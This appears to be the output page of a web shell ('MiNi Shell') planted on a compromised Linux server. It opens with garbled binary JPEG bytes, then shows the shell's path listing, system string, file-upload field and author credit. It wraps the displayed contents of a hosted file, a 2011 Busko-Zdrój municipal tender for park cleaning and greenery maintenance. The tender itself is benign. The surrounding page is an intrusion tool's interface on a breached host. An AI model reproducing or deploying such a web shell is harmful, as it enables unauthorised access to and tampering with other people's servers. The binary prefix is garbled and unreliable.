JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110221/58923-N-2011.html

<p class="kh_header"><b>Busko-Zdrój: Utrzymanie czystości, porządku i zieleni na terenie działek oznaczonych w ewidencji gruntów nr 91, nr 197 i nr 203 obr. 13 w Busku-Zdroju o powierzchni 11,90 ha</b><br>
<b>Numer ogłoszenia: 58923 - 2011; data zamieszczenia: 21.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości, porządku i zieleni na terenie działek oznaczonych w ewidencji gruntów nr 91, nr 197 i nr 203 obr. 13 w Busku-Zdroju o powierzchni 11,90 ha.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie czystości, porządku i zieleni terenie działek oznaczonych w ewidencji gruntów nr 91, nr 197 i nr 203 obr. 13 w Busku-Zdroju o powierzchni 11,90 ha.

	Do zakresu prac wykonywanych w ramach utrzymania parku wchodzić będą następujące czynności :

- koszenie trawy,
- pielęgnacja rabat bylinowych 
- pielęgnacja skupin krzewów i bylin,
- pielęgnacja zieleni wysokiej,
- pielęgnacja trawników,
- utrzymanie alejek parkowych,
- opróżnianie koszy,
-  lustracja terenu i usuwanie odpadów komunalnych,
  ( papiery, butelki, puszki, opakowania plastikowe, gałęzie itp. ),
- bieżące utrzymanie oczek wodnych,
- malowanie ławek, koszy, poręczy - ich bieżąca konserwacja i naprawa,
- utrzymanie w odpowiednim stanie technicznym tablic informacyjnych,
- grabienie i wywóz liści,
- nasadzenie bylin i krzewów


SZCZEGÓŁOWY ZAKRES ROBÓT I WARUNKI ICH WYKONANIA

1. Koszenie trawników o łącznej powierzchni 91 570 m2 w tym:
    - trawniki dywanowe - 2 580 m2
    - trawniki parkowe - 88 990 m2
Koszenie trawników dywanowych należy wykonywać przy użyciu sprzętu zapewniającego ich rozdrobnienie w taki sposób, aby nie zachodziła konieczność zagrabiania i wywozu z rejonu koszenia. Częstotliwość koszenia - raz w tygodniu.
Trawniki parkowe - wysokość trawy do koszenia na tej powierzchni nie może przekraczać 8 cm w okresie wegetacji. Skoszona trawa winna być usunięta.

2. Pielęgnacja rabat bylinowych ( parter słońca ) na powierzchni 1 560 m2  polega na : 
- okrywaniu rabat przed zimowymi nagłymi zmianami temperatur, wysuszeniem przez wiatry 
  i przegrzaniem przez słońce, 
- usunięciu okrycia zimowego,
- bieżącym usuwaniu zachwaszczeń,
- ściółkowaniu powierzchni pomiędzy roślinami korą lub zrębkami,
- podlewaniu w okresie pełnego rozwoju roślin przed kwitnieniem i w okresach  suszy,
- usuwaniu i przycinaniu wszelkich obumarłych i zeschniętych części roślin,
- nawożeniu nawozami mineralnymi lub organicznymi,
- zwalczaniu chorób i szkodników przy użyciu środków ochrony dopuszczonych do stosowania
  na terenach uzdrowisk,

3. Pielęgnacja skupin krzewów i bylin na powierzchni 4 450 m2  polega na : 
- okresowym zasilaniu nawozami mineralnymi,
- pieleniu chwastów ,
- okrywaniu na okres zimowy roślin tego wymagających,
- okresowym podlewaniu,
- wycinaniu suchych pędów, prześwietlaniu, skracaniu pędów,
- usuwaniu suchych krzewów i uzupełnianiu ubytków,
- zwalczaniu chorób i szkodników,

4. Pielęgnacja zieleni wysokiej ( drzewa w ilości ok. 1230 szt. ) polega na : 
- uzupełnianiu palików i wiązań,
- ściółkowaniu wokół drzewek, 
- okresowym podlewaniu,
- okresowym nawożeniu nawozami mineralnymi,
- wykonywaniu zabiegów pielęgnacyjnych w koronach drzew, 
- usuwaniu odrostów korzeniowych,
- usuwaniu uschniętych drzew,
- zwalczaniu chorób i szkodników,
- zabezpieczaniu na okres zimowy przed zgryzaniem przez zwierzęta ( osłonki, repelenty itp.).

5. Pielęgnacja trawników na powierzchni 91 570 m2 polega na :
- odchwaszczaniu ( trawniki dywanowe ),
- miejscowym dosiewaniu trawy,
- deszczowaniu w okresach suszy,
- okresowym nawożeniu nawozami mineralnymi,
-  napowietrzaniu,
- plantowaniu kretowisk,
- chemicznym niszczeniu uciążliwych chwastów wieloletnich.

6. Utrzymanie alejek parkowych o pow. 19 130 m2 w tym : szutrowe-6 260 m2, z kostki  
    brukowej - 12 870 m2 polega na :
-  usuwaniu nieczystości z ich powierzchni poprzez zamiatanie  na bieżąco,  
- okresowym myciu alejek z kostki,
- bieżącym usuwaniu zachwaszczeń,
- uzupełnianiu ubytków w alejkach szutrowych.

7. Opróżnianie koszy w ilości ok. 60 szt. polega na : 
- usuwaniu odpadów  6 razy w tygodniu w taki sposób, aby kosze nie były przepełnione, 
- wywiezieniu odpadów na legalne wysypisko śmieci.
Odbiór i transport muszą się odbywać zgodnie z obowiązującymi przepisami.

8. Lustracja terenów i usuwanie odpadów komunalnych polega na : 
- codziennej lustracji (7 dni w tygodniu) terenów ujętych w zamówieniu, 
- zbieraniu papierów, butelek, puszek, gałęzi, opakowań plastikowych itp.
  
9. Bieżące utrzymanie oczek wodnych  o powierzchni 2 290 m2 polega na :
- usuwaniu zanieczyszczeń - gałęzie, puszki, butelki, opakowania plastikowe,
- pielęgnowaniu i uzupełnianiu braków  roślinności wodnej,
- usuwaniu glonów i innych zanieczyszczeń roślinnych,
- chemicznym lub biologicznym oczyszczaniu wody w oczkach wodnych.
- utrzymywaniu w odpowiednim stanie technicznym mnichów przelotowych i spustowych,
- usuwaniu na bieżąco zanieczyszczeń i przetamowań,
- czyszczeniu kraty na wlocie do rurociągu ( Rów od Buska ).

10. Malowanie ławek (70 szt.), koszy, poręczy i ich bieżąca konserwacja i naprawa polega na :
-  malowaniu jeden raz w roku,
- wymianie i uzupełnieniu brakujących elementów stolarki drewnianej,
- bieżącym myciu ławek i  wkładów do koszy,
- wymianie uszkodzonych wkładów do koszy,

11. Utrzymanie w odpowiednim stanie technicznym tablic informacyjnych polega na :
- malowaniu słupków,
- utrzymaniu czytelności tablic.

12. Grabienie i wywóz liści polega na :
- sukcesywnym grabieniu liści z terenów zadrzewionych jesienią podczas ich opadania,
- usunięciu zagrabionych liści z terenów objętych zamówieniem.

13. Nasadzenie brakujących krzewów i bylin polega na : 
- starannym przygotowaniu podłoża polegającym na zniszczeniu wieloletnich uciążliwych       
   chwastów,
- nasadzeniu doniczkowanych  bylin i krzewów w ilościach :  
       - byliny ( parter słońca ) - 5 144 szt. ( wg załączonego wykazu )
      -  krzewy ( skupiny krzewów ) - 368 szt. ( wg załączonego wykazu ), 
- sukcesywnym podlewaniu w okresie wegetacyjnym,
- bieżącym usuwaniu zachwaszczeń,
- zwalczaniu chorób i szkodników,
- okresowym nawożeniu mineralno-organicznym.
Nasadzeń należy dokonać najpóźniej do 15 września 2011 roku.

Każdy Wykonawca winien zapoznać się z terenem objętym zamówieniem oraz warunkami związanymi z wykonaniem prac będących przedmiotem przetargu, celem właściwego skalkulowania ceny za wykonywane prace.

Opłaty za wywóz odpadów komunalnych z terenów objętych umową oraz ich składowaniem na legalnym wysypisku ponosić będzie Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie.  
- wymagane jest wykazanie co najmniej 2 usług obejmujących usługi podobne do przedmiotu zamówienia tj. utrzymaniu czystości, porządku i zieleni, w tym 1 usługa utrzymania czystości, porządku i zieleni wykonywana na terenie o powierzchni min. 5 ha</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest dysponowanie wymienionym poniżej sprzętem (pod pojęciem dysponowania rozumie się prawo własności jak również umowę dzierżawy, leasingu itp.):
a/ zamiatarka - min. 1 szt.,
b/ polewaczka - min. 1 szt.,
c/ kosiarka samobieżna - min. 1 szt.,
d/ zestaw wywozowy - min. 1 szt.,
e/ podkaszarka spalinowa - min. 2 szt.,
f/ piła łańcuchowa - min. 1 szt</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagana jest opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2011 godzina 10:00, miejsce: Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com